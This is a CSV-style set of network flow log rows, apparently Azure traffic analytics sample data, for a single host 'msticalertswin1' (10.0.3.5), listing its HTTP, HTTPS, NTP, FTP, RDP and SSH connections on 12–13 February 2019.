+833,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,8.253.45.249,41.0
+832,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,72.21.91.29,41.0
+831,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,13.107.4.50,41.0
+836,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.451,2019-02-12 20:08:47.000,2019-02-12 20:31:59.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '72.21.91.29', '8.253.45.249', '205.185.216.42', '23.223.3.100', '72.21.81.240', '23.48.36.78']",,,T,http,80.0,O,41.0,0.0,0.0,0.0,,eastus,72.21.81.240,41.0
+892,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,168.62.32.212,4.0
+891,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,4.0
+890,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,40.121.3.131,4.0
+889,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.239.152.10,4.0
+847,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.185,2019-02-12 20:09:35.000,2019-02-12 20:19:46.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.80.145.38', '40.87.63.92']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,eastus,eastus,40.87.63.92,2.0
+846,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.185,2019-02-12 20:09:35.000,2019-02-12 20:19:46.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.80.145.38', '40.87.63.92']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,eastus,eastus,40.80.145.38,2.0
+956,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,23.47.27.169,5.0
+960,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,65.55.163.78,5.0
+959,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,172.217.15.78,5.0
+957,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,65.55.163.76,5.0
+958,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,172.217.8.3,5.0
+902,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.076,2019-02-12 20:19:34.000,2019-02-12 20:19:41.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,2.0,0.0,0.0,,eastus,131.107.147.209,2.0
+899,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.060,2019-02-12 20:19:53.000,2019-02-12 20:19:53.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.74.179.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,13.74.179.117,1.0
+913,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.170,2019-02-12 20:30:17.000,2019-02-12 20:30:17.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['90.130.70.73'],,,T,ftp,21.0,O,1.0,0.0,0.0,0.0,,eastus,90.130.70.73,1.0
+944,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.732,2019-02-12 20:41:04.000,2019-02-12 20:41:04.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.252.190'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westus2,eastus,65.55.252.190,1.0
+952,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:02:18.000,2019-02-12 21:59:22.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,43.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,43.0
+953,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:02:18.000,2019-02-12 21:59:22.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,43.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,43.0
+970,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:17.189,2019-02-12 21:04:11.000,2019-02-12 21:46:51.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,5.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,5.0
+845,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.493,2019-02-12 21:09:14.000,2019-02-12 21:49:11.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,28.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,28.0
+844,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.493,2019-02-12 21:09:14.000,2019-02-12 21:49:11.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,28.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,28.0
+935,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.228,2019-02-12 21:09:36.000,2019-02-12 21:49:24.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.69.153.67', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,2.0
+934,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.228,2019-02-12 21:09:36.000,2019-02-12 21:49:24.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.69.153.67', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,40.69.153.67,2.0
+954,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:12:30.000,2019-02-12 21:58:34.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,7.0
+955,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:12:30.000,2019-02-12 21:58:34.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,7.0
+968,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,99.84.104.63,7.0
+965,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,157.55.134.136,7.0
+967,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,72.21.81.200,7.0
+966,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,204.79.197.200,7.0
+849,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,99.84.106.178,10.0
+850,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.3.13.106,10.0
+851,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,99.84.106.27,10.0
+853,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.45.180.234,10.0
+854,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,99.84.106.92,10.0
+855,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,72.21.81.240,10.0
+856,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.3.13.146,10.0
+852,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.3.13.112,10.0
+883,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.556,2019-02-12 21:53:05.000,2019-02-12 21:53:33.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.68.226.108'],,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus,eastus,13.68.226.108,6.0
+943,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.024,2019-02-12 21:53:07.000,2019-02-12 21:53:27.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['46.43.34.31', '212.13.197.231']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,212.13.197.231,5.0
+942,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.024,2019-02-12 21:53:07.000,2019-02-12 21:53:27.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['46.43.34.31', '212.13.197.231']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,46.43.34.31,5.0
+848,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:54:04.000,2019-02-12 21:55:36.000,2019-02-12 22:00:00.000,IntraVNet,,,,,10.0.3.5,104.211.30.1,T,ssh,22.0,O,6.0,0.0,0.0,0.0,,eastus,104.211.30.1,6.0
+839,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.399,2019-02-12 21:55:43.000,2019-02-12 21:55:43.000,2019-02-12 22:00:00.000,IntraVNet,,,,,10.0.3.5,10.0.3.4,T,ssh,22.0,O,1.0,0.0,0.0,0.0,,eastus,10.0.3.4,1.0
+969,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:17.236,2019-02-12 21:55:43.000,2019-02-12 21:55:43.000,2019-02-12 22:00:00.000,IntraVNet,,,,,10.0.3.5,10.0.3.4,T,ssh,22.0,I,0.0,1.0,0.0,0.0,,eastus,10.0.3.5,1.0
+945,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.640,2019-02-12 21:59:58.000,2019-02-12 22:59:00.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,19.0
+946,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.640,2019-02-12 21:59:58.000,2019-02-12 22:59:00.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,19.0
+908,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:45.806,2019-02-12 22:02:27.000,2019-02-12 22:02:27.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.183.114.173'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westus2,eastus,52.183.114.173,1.0
+870,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:59.499,2019-02-12 22:03:55.000,2019-02-12 22:55:07.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+885,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.937,2019-02-12 22:08:42.000,2019-02-12 22:20:48.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,8.0
+884,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.937,2019-02-12 22:08:42.000,2019-02-12 22:20:48.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,8.0
+872,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.358,2019-02-12 22:10:15.000,2019-02-12 22:58:35.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+873,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.358,2019-02-12 22:10:15.000,2019-02-12 22:58:35.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.79.85.125,5.0
+874,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.358,2019-02-12 22:10:15.000,2019-02-12 22:58:35.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+920,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.134,2019-02-12 22:11:32.000,2019-02-12 22:13:05.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['104.43.212.12', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,2.0
+919,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.134,2019-02-12 22:11:32.000,2019-02-12 22:13:05.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['104.43.212.12', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,104.43.212.12,2.0
+840,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:45.890,2019-02-12 22:14:39.000,2019-02-12 22:19:42.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '20.38.98.100']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,52.239.152.10,2.0
+841,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:45.890,2019-02-12 22:14:39.000,2019-02-12 22:19:42.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '20.38.98.100']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,2.0
+860,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:59.515,2019-02-12 22:22:35.000,2019-02-12 22:55:37.000,2019-02-12 23:00:00.000,IntraVNet,,,,,10.0.3.5,104.211.30.1,T,ssh,22.0,O,12.0,0.0,0.0,0.0,,eastus,104.211.30.1,12.0
+921,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.837,2019-02-12 22:43:34.000,2019-02-12 22:43:34.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+816,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:01:55.000,2019-02-12 23:58:05.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+821,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:08:42.000,2019-02-12 23:58:36.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+822,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:08:42.000,2019-02-12 23:58:36.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+819,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:12:11.000,2019-02-12 23:46:19.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+820,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:28:35.000,2019-02-12 23:28:35.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+817,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:29:35.000,2019-02-12 23:29:35.000,2019-02-13 00:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+818,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:53:50.000,2019-02-12 23:53:50.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+825,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.618,2019-02-13 00:03:23.000,2019-02-13 00:54:35.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+823,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.618,2019-02-13 00:04:27.000,2019-02-13 00:54:23.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+828,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:13:36.000,2019-02-13 00:58:37.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.79.85.125,5.0
+827,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:13:36.000,2019-02-13 00:58:37.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+824,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.618,2019-02-13 00:38:42.000,2019-02-13 00:53:42.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+826,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:39:33.000,2019-02-13 00:47:33.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,2.0
